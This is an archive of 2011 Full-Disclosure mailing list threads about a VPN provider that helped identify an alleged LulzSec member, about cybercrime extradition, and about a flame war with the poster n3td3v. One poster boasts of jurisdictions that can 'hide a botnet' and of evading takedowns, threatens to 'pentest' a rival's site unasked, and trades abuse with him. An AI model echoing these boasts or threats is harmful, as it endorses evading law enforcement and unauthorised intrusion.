cool. >>> > :) >>> > cheers, your loved by many, you just have many trollers to :sp >>> > take care , >>> > xd >>> > >>> > >>> > On 28 September 2011 14:32, Laurelai Storm >>> wrote: >>> > >>> >> Im suprised, someone on the internet who *doesn't * hate me :p >>> >> On Sep 27, 2011 11:29 PM, "GloW - XD" wrote: >>> >> > Hello Laurelai , >>> >> > Oh i agree it is still a terrible precedent to be set.. I dont even >>> know >>> >> > where, legally, i stand anymore... >>> >> > It is rather disturbing, nomatter WHO it was laurela. >>> >> > I am all for the hatred against the VPN provs, and this is not just >>> >> > happening here, and i made a BIG statement about this, and privacy, >>> in my >>> >> > channel on efnet, first as i saw it. >>> >> > >>> >> > Then saw a torrentfreak feed,of someone who was an owner of a huge >>> >> torrent >>> >> > site, was handed to authorities, not by the hoster, no... but by the >>> >> > frigging payment handler, ie paypal or alertpay most likely. >>> >> > >>> >> > This is not good, it makes a grey could now over what is 'anon' and >>> what >>> >> > isnt. and thats a bad thing for us all. >>> >> > To much fraud is causing this, thats plain and simple.Abusing places >>> like >>> >> > Sony, and, major banks, only make the authorities turn to politics, >>> whom >>> >> in >>> >> > turn can bully with federal and state laws of ANY country, i think >>> this >>> >> is >>> >> > the dangerous part wich is affecting lulzsec members or whoever was >>> apart >>> >> of >>> >> > it, and, i mean efnet is no recruiting grounds for decent hkrs. >>> >> > Simple as that, you know it, maybe thru word of mouth ok, but not >>> alone >>> >> by >>> >> > being in channels but that network, is one federal hideout now..and, >>> that >>> >> is >>> >> > every channel, if it is not being spied (yea they have a module >>> >> > m_spychannel.c or similar, wich, they actually had without >>> realising, >>> >> asked >>> >> > a friend, to code for them. >>> >> > This was rejected by me/her,but i believe they have the module >>> running >>> >> now. >>> >> > So, what was to stop them adding theyre own hidden spy mode to it :s >>> look >>> >> at >>> >> > what they did to my old channel #haqnet, they introduced drinemon >>> and a >>> >> > bunch of other things, when it could have been simply worked out >>> with >>> >> > words.. but anyhow, i will not brood on the past, i hope this is >>> mutual >>> >> > Laurelai, I have nothing bad to say about you, and in turn, expect >>> th
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
err, you are limited in those countries dude... id really checkup on that ... maybe some but, yea i agree, i dont think any hosting is anon, but, i sure know i have kept an anon dedis in past, and was VERY easy to avoid handing anything over. Unless they had personally seized from my company, i was allowed to basically get away with, and if i want to, again, could do the same 'anonymously' and, indeed keep those details, away. it is not frigin hard dude, where did Yyou get the idea, that is not hard to move a user around boxes :P and rename them, etc etc etc, always change ipv6 tunnels... there is somany ways, you obv have not ran a dedicated server in a company environment coz boi, they hide nets on legit hostin now, legit apparently* companies...and they do it using those simple means, and, even show logs of them 'removing and deleting' files of the apprent 'bad user' , this is, a whole different level than even needing to deal with cops.. so, you are scared too much by laws wich can be smokescreened. Run a dedis, or simply ask a admin, howmany abuse they get, and howmany users they actually rm ;) you would want this service, on your vps ? i surely wouldnt,. i know, with me, if i offer anon, you stay damn anon, if you bring cops to MY HOUSE, then i may have to try and, simply keep my darn data secure ey ? how about that ? simple methods, defeat simple plans benji. xd On 29 September 2011 22:53, Benji wrote: > Yes they do. If you buy a server in America for example, even if you are > located in Russia, they are required by federal law to hand over your > details wherever you may reside. I dont know where you've obtained this idea > that they can't. > > Just because something is advertised as 'anonymous' doesnt mean it's 'so > anonymous you can break the law' and anyone using a EU/US-related country to > do this is either stupid or naive. > > On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41 wrote: > >> They advertised as anonymous VPN to 'everyone'. >> Then, that would mean, especially NOT locally, thats something wich is >> also, subject to federal laws though so, in its own country, the provider >> may have to, nomatter whats advertised, BUT outside of country customers, >> should not be handed over. >> isp's here dont do it, and havent, for like 20 yrs, they also do not take >> down people,issue nor execute other peoples 'takedown orders', there is many >> reasons for this but basically, they loose money from it. >> Anyhow, in UK, you maybe right, but outside of there, then, they should >> have maybe not advertised as anononymous vpn services for everyone and >> anyone. thats obvious crap we know now. >> anyhow, cheers, >> xd >> >> >> >> On 29 September 2011 22:45, Benji wrote: >> >>> Im sorry, why is it 'worrying' that a vpn provider that was a UK business >>> and was located in the UK, is subject to UK law? >>> >>> >>> >>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn < >>> d.martyn.fulldisclos...@gmail.com> wrote: >>> >>>> Again, I hope this does not fail to send. >>>> The reasoning behind the "Pure Elite" recruitment channel was A: to >>>> recruit some talented people (and, by all accounts, there were some >>>> talented >>>> programmers there) and B: development and idle talk. Now more interesting >>>> was the reasoning behind the name - by putting the developers and coders >>>> and >>>> potential recruits in a channel named "Pure Elite", it was essentially an >>>> ego boost for the new guys, made them feel valued, etc, when in fact most >>>> were but pawns to be used (IMHO). >>>> >>>> This co-operation between VPN providers and LEO, while being nothing new >>>> - remember how hushmail caved in - is indeed worrying for those of us who >>>> are privacy advocates as well as security researchers. >>>> >>>> On a more direct note, Laurelei, do not presume that you know all there >>>> is to know about them. Doing so would be foolish. (Now don't go assuming >>>> that I hate you, I bear you bugger all ill-will, etc). >>>> Good day. >>>> >>>> >>>> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm >>>> wrote: >>>> >>>>> Its all good dude. What really concerns me is that vpn providers might >>>>> give over logs to oppressive regemes. TOR is starting to look better and >>>>> better. >>>>> On Sep 27, 2011 11:40 PM, "GloW - X
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
indeed :) but, it is how a proper anon person would operate, well, tht is how i once did... anyhow, it is to broad, and, yes, i qwould never believe in bulletproof, unless i have used it maybe, for 10yrs, thru 10 botnets ;P wich, is very rare but funnily, possible. webhosters, are even more corrupt and better at hiding data.. face it, if the vpn provider had not shat themself, then it would be a non story. On 29 September 2011 23:00, Benji wrote: > 'Abuse' emails and court orders are very different. > > On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41 wrote: > >> err, you are limited in those countries dude... id really checkup on that >> ... maybe some but, yea i agree, i dont think any hosting is anon, but, i >> sure know i have kept an anon dedis in past, and was VERY easy to avoid >> handing anything over. Unless they had personally seized from my company, i >> was allowed to basically get away with, and if i want to, again, could do >> the same 'anonymously' and, indeed keep those details, away. >> it is not frigin hard dude, where did Yyou get the idea, that is not hard >> to move a user around boxes :P >> and rename them, etc etc etc, always change ipv6 tunnels... there is >> somany ways, you obv have not ran a dedicated server in a company >> environment coz boi, they hide nets on legit hostin now, legit apparently* >> companies...and they do it using those simple means, and, even show logs of >> them 'removing and deleting' files of the apprent 'bad user' , this is, a >> whole different level than even needing to deal with cops.. so, you are >> scared too much by laws wich can be smokescreened. >> Run a dedis, or simply ask a admin, howmany abuse they get, and howmany >> users they actually rm ;) >> you would want this service, on your vps ? >> i surely wouldnt,. i know, with me, if i offer anon, you stay damn anon, >> if you bring cops to MY HOUSE, then i may have to try and, simply keep my >> darn data secure ey ? >> how about that ? >> simple methods, defeat simple plans benji. >> xd >> >> >> >> On 29 September 2011 22:53, Benji wrote: >> >>> Yes they do. If you buy a server in America for example, even if you are >>> located in Russia, they are required by federal law to hand over your >>> details wherever you may reside. I dont know where you've obtained this idea >>> that they can't. >>> >>> Just because something is advertised as 'anonymous' doesnt mean it's 'so >>> anonymous you can break the law' and anyone using a EU/US-related country to >>> do this is either stupid or naive. >>> >>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41 wrote: >>> >>>> They advertised as anonymous VPN to 'everyone'. >>>> Then, that would mean, especially NOT locally, thats something wich is >>>> also, subject to federal laws though so, in its own country, the provider >>>> may have to, nomatter whats advertised, BUT outside of country customers, >>>> should not be handed over. >>>> isp's here dont do it, and havent, for like 20 yrs, they also do not >>>> take down people,issue nor execute other peoples 'takedown orders', there >>>> is >>>> many reasons for this but basically, they loose money from it. >>>> Anyhow, in UK, you maybe right, but outside of there, then, they should >>>> have maybe not advertised as anononymous vpn services for everyone and >>>> anyone. thats obvious crap we know now. >>>> anyhow, cheers, >>>> xd >>>> >>>> >>>> >>>> On 29 September 2011 22:45, Benji wrote: >>>> >>>>> Im sorry, why is it 'worrying' that a vpn provider that was a UK >>>>> business and was located in the UK, is subject to UK law? >>>>> >>>>> >>>>> >>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn < >>>>> d.martyn.fulldisclos...@gmail.com> wrote: >>>>> >>>>>> Again, I hope this does not fail to send. >>>>>> The reasoning behind the "Pure Elite" recruitment channel was A: to >>>>>> recruit some talented people (and, by all accounts, there were some >>>>>> talented >>>>>> programmers there) and B: development and idle talk. Now more interesting >>>>>> was the reasoning behind the name - by putting the developers and coders >>>>>> and >>>
[Full-disclosure] VPN providers and any providers in general...
Dude, If you really want to be 'invisible' this is not hard todo.. if you expect to, jump around on peoples servers, illegally, for long amounts of time, ie, daily/wekly/yearly,and are a pest, who would want to make you or help you even be invisible. there are KNOWN places, i have used, and known places wich will not store data, or maybe, provide a proxxy but, they can certainly hide a botnet... but ofcourse, these things dont come cheap :) there are forsure places, go ahead and try and screw over a server in say... panama ? ever checked theyre laws ? ONLy people who commit ANY crime in THEYRE country, will be arrested...ever noticed the main BIGGER servers are hosted there, even chat ones ? Thats just how it has and always will be, where and if you wish to pursue this method..as you said yourself, do it yourself..and thats fine, for me.. I also speak from someone who does not believe in using vpn providers, but, i know wich countrys i could rely on, for a secure box. Thats just laws..wich is all online... Panam, is only oen of 10 i can think of offhand... thats pklenty of servers. cute eh cheers. xd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
ithin 5yrs, but, that is probably too close.. but, it will happen, then, there willbe official-treatys wich cannot be avoided, and, maybe less 'seizure' of boxes, and more 'security work' , wich is, how the most effective takedowns work.. but, any isp manager knows the truth, isps recieve hundreds of takedown-orders yearly, and, act on none. So, it is not a matter of just law, there is still the grey clud of *wheres the rest of the laws* to make it any real, good and viable direct way to arrest someone, in one simple phone call and fax. that is where it will be, once there is more NOC's around and feds online. The military, already spends millions on its own sec, so, theyre no dummys, yet, they also use facebook :P the internet, is still evolving, once the evolution is abit more complete legally, there will still be a cloud over each and every bust, as each one is different, and, qwuestions raised as to what/why/who done what, and, as i know of at this date there si still a guy being blamede for this, who says it did not happen atall lately, but, over a year ago, and, he was 'questioned', now, i have his Private log of conversation, should i be subject to, storing this for another country, and, holding it as evidence, but, what the heck if my hd blows up :P the cloud hovers... great topic but, still a very grey area,unfortunately. (Id like to know where id even be ranked! id like to think, a Gebneral or, maybe PM!) cheers, xd On 1 October 2011 08:36, wrote: > On Thu, 29 Sep 2011 23:55:18 +1000, xD 0x41 said: > > > there are KNOWN places, i have used, and known places wich will not store > > data, or maybe, provide a proxxy but, they can certainly hide a botnet... > > As far as you know... :) > > > ONLy people who commit ANY crime in THEYRE country, will be > arrested...ever > > noticed the main BIGGER servers are hosted there, even chat ones ? > > Not sure how that should be parsed, and the parsing is crucial here - did > you mean > "they have to commit a crime in their country", or "They have to do > something that > *would* be a crime in their country"? > > The general rule is that in order for an extradition to happen, several > things must > be true: > > 1) The two countries involved need to have extradition treaties in place. > 2) The activity must constitute a crime in the country harboring the > accused. > 3) The proposed punishment must not be drastically worse than what the > harboring country would impose > > So the US can extradite somebody for murder from pretty much anyplace, > because > out of 213 or so recognized sovereign governments, there's something like 8 > that don't have reciprocal treaties in place for extradition, and murder is > illegal in pretty much everywhere. However, if you're going after somebody > for > cybercrime, it won't work unless the country has laws against cybercrime > that > cover the situation in question. As for the third part, the US has on > several > occasions had to guarantee no death penalty for accused murderers they've > extradited from countries that don't do capital punishment. > > So Gary McKinnon got hit with extradition even though he never got accused > of > breaking a British law (as far as I know)- because the charge *would* have > been a crime if he *had* targeted a British server rather than a US server. > Meanwhile, Julian Assange's extradition on a rape charge hit some serious > legal > snags because the exact behavior that Assange was accused of didn't > actually > meet the definition of "rape" in England. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
haha i should have just agreed with this bit from the start! However, if you're going after somebody for cybercrime, it won't work unless the country has laws against cybercrime that cover the situation in question. !! lol!! still, a very funny story there with UK...but theyre, again, a monarchy, and, they ckinda have laws to suit them :P As you also said, murder is a no brainer in any place...well, maybe not iraq or afghanistan just yet :P lol.. anyhow, thanks for the interesting place to take my head at 9am :P ,very interesting the topic as a whole..very good to debate this stuff, and run for/against it, because then you would probably see more to... so, i guess some people should disagree for the sake of arguments sake or, just kill the thread ;p lol, take care Valdis, xd / Dru On 1 October 2011 08:36, wrote: > On Thu, 29 Sep 2011 23:55:18 +1000, xD 0x41 said: > > > there are KNOWN places, i have used, and known places wich will not store > > data, or maybe, provide a proxxy but, they can certainly hide a botnet... > > As far as you know... :) > > > ONLy people who commit ANY crime in THEYRE country, will be > arrested...ever > > noticed the main BIGGER servers are hosted there, even chat ones ? > > Not sure how that should be parsed, and the parsing is crucial here - did > you mean > "they have to commit a crime in their country", or "They have to do > something that > *would* be a crime in their country"? > > The general rule is that in order for an extradition to happen, several > things must > be true: > > 1) The two countries involved need to have extradition treaties in place. > 2) The activity must constitute a crime in the country harboring the > accused. > 3) The proposed punishment must not be drastically worse than what the > harboring country would impose > > So the US can extradite somebody for murder from pretty much anyplace, > because > out of 213 or so recognized sovereign governments, there's something like 8 > that don't have reciprocal treaties in place for extradition, and murder is > illegal in pretty much everywhere. However, if you're going after somebody > for > cybercrime, it won't work unless the country has laws against cybercrime > that > cover the situation in question. As for the third part, the US has on > several > occasions had to guarantee no death penalty for accused murderers they've > extradited from countries that don't do capital punishment. > > So Gary McKinnon got hit with extradition even though he never got accused > of > breaking a British law (as far as I know)- because the charge *would* have > been a crime if he *had* targeted a British server rather than a US server. > Meanwhile, Julian Assange's extradition on a rape charge hit some serious > legal > snags because the exact behavior that Assange was accused of didn't > actually > meet the definition of "rape" in England. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Good q, I think B and C would have some juristiction, depending on crime impact ofc. yes indeed, if one of those countries is say USA and the hacker has used X to rip off A for huge huge amounts of say crecitcard injections... then forsure something is there, or, they would make it on the spot i am sure, if it were usa :) I wonder though, about australia, and uk and some other smaller countries, they may not... wich is, the greyish area still... but, i think it is crime impact on this one, and country a or b, being a power,politically,press wise, especially.. It is a good case to watch the Assange, as theyre basically doing just that now with him, creating the laws needed to create the extraditions... or so i believe. Although his case is abit cloudy , the rape being connected with, wikilkeaks for example.. But, that is where they make things up even, to create press,crime impact/victim impact, is taramount. regards, xd On 1 October 2011 23:03, Darren Martyn wrote: > Quick question regarding the extradition stuff. Say hacker X was caught in > country A, for cyber crimes in country A, but had also comitted crimes > against servers in countries B and C. Would B and C have any right to > extradite him/her or would they merely be tried for said crimes in country > A? (assuming country A brought them to trial in the end). > > Anyone have a definitive answer? > > On Sat, Oct 1, 2011 at 5:50 AM, wrote: > >> On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said: >> >> > As you also said, murder is a no brainer in any place...well, maybe not >> iraq >> > or afghanistan just yet :P lol.. >> >> Iraq, for all its problems, is still a place with a somewhat functional >> judicial system. The court system may be broken, but you in general *will* >> at >> least appear in a courtroom with a judge and be pronounced guilty before >> you're >> punished. >> >> I was actually thinking more along the lines of totally failed states >> such as >> Somalia, Sudan, or the contested parts of Afghanistan, where you can't be >> tried >> for murder because there isn't a court to try you *in*. >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Ah, the legend of the mailing-list himself, has spoken. not knowing you, for all i have seen, your a pathetic sack of rubbish, and really, what we are discussing, if you had ANY clue, wich obv dont, is simply how far our own freedom is going. You are an idiot. Have a nice day. xd On 2 October 2011 08:45, andrew.wallace wrote: > On Sat, Oct 1, 2011 at 5:50 AM, wrote: > > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said: > > > >> As you also said, murder is a no brainer in any place...well, maybe not > iraq > >> or afghanistan just yet :P lol.. > > > > Iraq, for all its problems, is still a place with a somewhat functional > > judicial system. The court system may be broken, but you in general > *will* at > > least appear in a courtroom with a judge and be pronounced guilty before > you're > > punished. > > > > I was actually thinking more along the lines of totally failed states > such as > > Somalia, Sudan, or the contested parts of Afghanistan, where you can't be > tried > > for murder because there isn't a court to try you *in*. > > > > Have you not grown old of talking to children on mailing lists? > > --- > > Andrew Wallace > > Independent consultant > > www.n3td3v.org.uk > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Hi n3td3v, I just decided to see, exactly who you are, calling me a kid. Now i run a site, crazycoders.com , very small, I have, apparently, a lot more knowledge in IT sec, than yourself and your credentials. i dont put anywhere, i am some 'security consukltant' , why, because security is ever evolving, unlike your website layout.. http://n3td3v.org.uk/ Your website is pathetic, and mirrors your own self, usually thats how it goes, but i could just be wrong. Also for an IT consultant demanding things, you only have published, useless and false PoC's, i could point probably 100 of those out atleast, your seemingly not well liked by *everyone* in the sec world, yet you dare to call people such as Valdis, benji,me , kids. ? your really pathetic, I pray you just *poof* dissapear.. but, I guess that would just be tooo easy nowdays, wouldnt it ? How is that linespeed now, on your n3td3v ,is it as secure, as you seem to want to portray ? can i see if it is ? i will pentest you, you cry, sounds good to me. Have fun! xd PS: You seem to be the kid here, not us people discussing a very legal problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
hahah opfc, now your a federal policeman to! yes mate.. please, go jerk off somewhere else, dont bother to speak to me, because, i dont care less for what your even speaking about, nor care less for you either, and yea, Im in .au, UK has great treatys here, arrest me :) cheers xd PS: Your to stupid to even pass a police test, and probably to fat. On 2 October 2011 12:38, andrew.wallace wrote: > I do like to investigate and lock people up when necessary. > > If you were to for instance: take out critical infrastructure in the UK, > the energy & utilities sector, transportation and disable a Royal Navy ship > from communicating you may get my attention. > > Andrew > > ------ > *From:* xD 0x41 > *To:* andrew.wallace ; > full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu; Benji < > m...@b3nji.com> > *Sent:* Sunday, October 2, 2011 12:44 AM > *Subject:* Is this for real.. http://n3td3v.org.uk/ > > Hi n3td3v, > I just decided to see, exactly who you are, calling me a kid. > Now i run a site, crazycoders.com , very small, I have, apparently, a lot > more knowledge in IT sec, than yourself and your credentials. > i dont put anywhere, i am some 'security consukltant' , why, because > security is ever evolving, unlike your website layout.. > http://n3td3v.org.uk/ > Your website is pathetic, and mirrors your own self, usually thats how it > goes, but i could just be wrong. > Also for an IT consultant demanding things, you only have published, > useless and false PoC's, i could point probably 100 of those out atleast, > your seemingly not well liked by *everyone* in the sec world, yet you dare > to call people such as Valdis, benji,me , kids. ? > your really pathetic, I pray you just *poof* dissapear.. but, I guess that > would just be tooo easy nowdays, wouldnt it ? > How is that linespeed now, on your n3td3v ,is it as secure, as you seem to > want to portray ? can i see if it is ? i will pentest you, you cry, sounds > good to me. > Have fun! > xd > > > PS: You seem to be the kid here, not us people discussing a very legal > problem. > > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Laurelai , you think i did that for 'looks' :) I have had that up, BUT not spammed any links for it, never, and, i waited for anyone to pick it. not once until this topic came up, so atleast we will see, although i have already dealt with this, and oh, psychz.net know me very well and my website, and funny but, there is a VERY tight relationship there :) I will wait and see if they get pestered by M$ , I will be in awe of the great n3td3v ? no, i will then know atleast there is SOME laws wich work, but again it prooves little about more serious stuff, but, nowdays wares should be enough. Anyhow, we will see, but I aint touching my website, until Psychz has a 'takedown' order, and, you shuld know what this is yes n3td3v ? and understand, it may not affect me, nor my hosters, and, then where will u be at ? i have done well to be a troll, this experimen in itself, is amazing results. Sofar, only one idiot who even spoke up when we discussed security, I am trying to get somewhere... but, the wrong person showed up :s got a fatty, rather than a cop. ohwell, maybe next shot ill b luckier ;P xd CRAZYCODERS.COM fo eva baby! PS come get me fatty n3td3v , show me your name on a takedown order weich *I* must agree to. On 3 October 2011 10:03, Laurelai Storm wrote: > They haven't managed to get rid of Wikileaks or Pirate Bay :) > On Oct 2, 2011 5:55 PM, "Jeffrey Walton" wrote: > > On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm > wrote: > >> I don't think they have the authority to seize non us domains owned by > >> people not in the US. > > DNS is vulnerable to attackers and legislation alike. > > > >> On Oct 2, 2011 5:44 PM, "andrew.wallace" > > >> wrote: > >>> On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD wrote: > Yes, it is nice ay :) > When M$ asks me to remove it, I shall. > cheers. > xd > >>> > >>> It doesn't work that way, your domain will be seized by DHS-ICE. > >>> > >>> http://www.ice.gov/about/offices/homeland-security-investigations/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Good move! Going back to my own example, say all three are first world countries, and A and C are in the EU whilst B is the US. All nations involved have good diplomatic relations and preexisting extradition treaties, and to add interest to it, lets say the LEO in B and C helped the investigation. The criomes would be non-financial, but say, large scale hacks and such. I will use Jake Davis's case as a "canary case" for this though... Id say, if the hacks are financial, then for sure yes. If the guy is continuously ripping the places off and LEO is then involved directly, the investigation would be ofcourse funded by whom ever was loosing funds probably, as i know with some other cases, this has been the case with one usa person who was really angry about being rooted and such.. so he personally financed the whole lot. i assume this would speed it up... so, i would say, if there is also some fbi.gov investigations opened on it, then the usa will be directly involed in a way, and bve even more able to execute any warrants such as box seizures or router-taps. I am saying "yes" in this case if the financiers personally fund it, 100% yes. I am sure, if there is a few people loosing money, and theyre offered to use that route, it would be considered. It was and has been done in Australia, and the box was in usa soil and it was the fastest takedown i have seen, wich had abs NO press involved. So, you have 2 countries here, and 2 leo involved, ofcourse they will workout something if there is financial gain to be had.. the hacks alone, is classed as 'break and enter' at moment, at-best. I know this excuse (exactly: sql-onjection) was used as a means to get router taps to actually, takedown the person for ddos and ddos networks.It is just, the people who were getting ddosd,personally came to the country the servers were mainly in, they were just one of many isps involved, and personally sat and laid the charges, so the police had a direct ordfer 9sngapore - au) , and bang, they got him.. he is fine tho, the charges wre minimal and he did abs no time. the case is somewhat primitive but, for hacks alone, i know the guy is still around irc and, knows that he cannot do anything illegal or, presumes that, he is always watched now by fbi or others. So it is hard one. i say yes, because ive seen it done, but only if the treaty is extremely clearand, with ALL countrys this would have to be, agreed upon atleast, if not executed in usa, atleast they would agree to the act and, possibly assist if need be. Is very wide, financial gain and pedoflia is the main targets atm, wich is 'thank god theyre not wasting time on wares..' basic, is my attitude and always will be on this.. I still think, a hoster, has not to takedown anyone, specially if the customer is promoting free speech (and is being done right now with wikileaks..) so, what a mess! great topic tho, love this, it is really interesting, but, again i would like to call on a hugher authority to simply make a post regarding this, someone with some power in a large comapny, who would have a vested interest in NOT getting owned and, theyre databases of cc stolen, thats what i want, a personal opinion from someone higher, who has this as a potential to become a problem one day. I guess i am abit hardcore on this whole topic eh ;p cheers, it makes for good thinking, xd On 3 October 2011 19:16, Darren Martyn wrote: > Going back to my own example, say all three are first world countries, and > A and C are in the EU whilst B is the US. All nations involved have good > diplomatic relations and preexisting extradition treaties, and to add > interest to it, lets say the LEO in B and C helped the investigation. The > criomes would be non-financial, but say, large scale hacks and such. I will > use Jake Davis's case as a "canary case" for this though... > > On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41 wrote: > >> Ah, the legend of the mailing-list himself, has spoken. >> not knowing you, for all i have seen, your a pathetic sack of rubbish, and >> really, what we are discussing, if you had ANY clue, wich obv dont, is >> simply how far our own freedom is going. >> You are an idiot. >> Have a nice day. >> xd >> >> >> >> On 2 October 2011 08:45, andrew.wallace wrote: >> >>> On Sat, Oct 1, 2011 at 5:50 AM, wrote: >>> > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said: >>> > >>> >> As you also said, murder is a no brainer in any place...well, maybe >>> not iraq >>> >> or afghanistan just yet :P lol.. >>> > >>> > Iraq, for all its problems, is still a place with a somewhat functional >>> > judicial system. The court system may be broken, but you in general >>> *will* at >>> > least appear
Re: [Full-disclosure] VPN providers and any providers in general...
Could just lok at the recent david cecil case here in .au. It does say alot, because he did breach some bigger networks.. and he was committing 'smaller' scale fraud but, still fraud, however, his main problem was what he did to a governemnt site, wich was deface it for personal gain, not profit. It is the latest case wich would be valid of this. still.. intresting infos... good stuff. xd On 3 October 2011 19:16, Darren Martyn wrote: > Going back to my own example, say all three are first world countries, and > A and C are in the EU whilst B is the US. All nations involved have good > diplomatic relations and preexisting extradition treaties, and to add > interest to it, lets say the LEO in B and C helped the investigation. The > criomes would be non-financial, but say, large scale hacks and such. I will > use Jake Davis's case as a "canary case" for this though... > > On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41 wrote: > >> Ah, the legend of the mailing-list himself, has spoken. >> not knowing you, for all i have seen, your a pathetic sack of rubbish, and >> really, what we are discussing, if you had ANY clue, wich obv dont, is >> simply how far our own freedom is going. >> You are an idiot. >> Have a nice day. >> xd >> >> >> >> On 2 October 2011 08:45, andrew.wallace wrote: >> >>> On Sat, Oct 1, 2011 at 5:50 AM, wrote: >>> > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said: >>> > >>> >> As you also said, murder is a no brainer in any place...well, maybe >>> not iraq >>> >> or afghanistan just yet :P lol.. >>> > >>> > Iraq, for all its problems, is still a place with a somewhat functional >>> > judicial system. The court system may be broken, but you in general >>> *will* at >>> > least appear in a courtroom with a judge and be pronounced guilty >>> before you're >>> > punished. >>> > >>> > I was actually thinking more along the lines of totally failed states >>> such as >>> > Somalia, Sudan, or the contested parts of Afghanistan, where you can't >>> be tried >>> > for murder because there isn't a court to try you *in*. >>> > >>> >>> Have you not grown old of talking to children on mailing lists? >>> >>> --- >>> >>> Andrew Wallace >>> >>> Independent consultant >>> >>> www.n3td3v.org.uk >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Hi! I did not see that bit, the frontpage was pretty shockin, for what he proclaims to be.. he is not very pro for a 'pro' , i thinnk his code speaks for itseklf to. lol..is he trying to find some new buffer overflow, using fonts!@ perhaps.. they say a little fish can turn into a big fish overnight! cheers, xd On 3 October 2011 21:39, Jacqui Caren-home wrote: > On 02/10/2011 18:38, Stefan Jon Silverman wrote: > > oy, list newbie meets n3td3v -- this should be fun > > Just looked at this site. Shudder. > > FYI: this is PART of one sentence! > This site should be linked to within the wikip definition of "tag soup" :-) > > > is a professional consu > ltancy size="3"> size="4"> > size="3"> size="4"> > size="3"> size="4"> > > size="4"> > size="3"> size="4"> > size="3"> size="4"> > > > color="#414B56"> ize="2"> > offering business services to a wide range of clients within > > size="3"> size="4"> > size="3"> size="4"> > size="3"> size="4"> > > color="#414B56"> ize="2"> > > the UK industry. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
none of them exactly screams "IM A PROFESSIONAL" No, but i dont claim to be an IT security pro, either. My site, is a personal, crappy lil blog, nothing more than a tool for me. it is the first osts i have made to it, in over 4yrs of it up :P so i am not really, one huge on self promotion.. so, i dont really care, my site, was home made templates for some of it, so, it is to learn how to use adobe photoshop better, a chance for me to learn, nothing more. this was never about my site. it was about him, picking on the whole notion, of freedom to speak and express oneself, and promoting things such as arresting people, ridiculous. xd On 3 October 2011 22:13, doc mombasa wrote: > i dont think either one of you have nice sites > none of them exactly screams "IM A PROFESSIONAL" > quite the contrary.. > > 2011/10/3 xD 0x41 > >> Hi! >> I did not see that bit, the frontpage was pretty shockin, for what he >> proclaims to be.. he is not very pro for a 'pro' , i thinnk his code speaks >> for itseklf to. lol..is he trying to find some new buffer overflow, using >> fonts!@ >> perhaps.. they say a little fish can turn into a big fish overnight! >> cheers, >> xd >> >> >> >> On 3 October 2011 21:39, Jacqui Caren-home wrote: >> >>> On 02/10/2011 18:38, Stefan Jon Silverman wrote: >>> > oy, list newbie meets n3td3v -- this should be fun >>> >>> Just looked at this site. Shudder. >>> >>> FYI: this is PART of one sentence! >>> This site should be linked to within the wikip definition of "tag soup" >>> :-) >>> >>> >>> is a professional consu >>> ltancy >> size="3">>> size="4"> >>> >> size="3">>> size="4"> >>> >> size="3">>> size="4"> >>> >>> >> size="3"> >>> >> size="3">>> size="4"> >>> >> size="3">>> size="4"> >>> >>> >>> >> color="#414B56">>> ize="2"> >>> offering business services to a wide range of clients 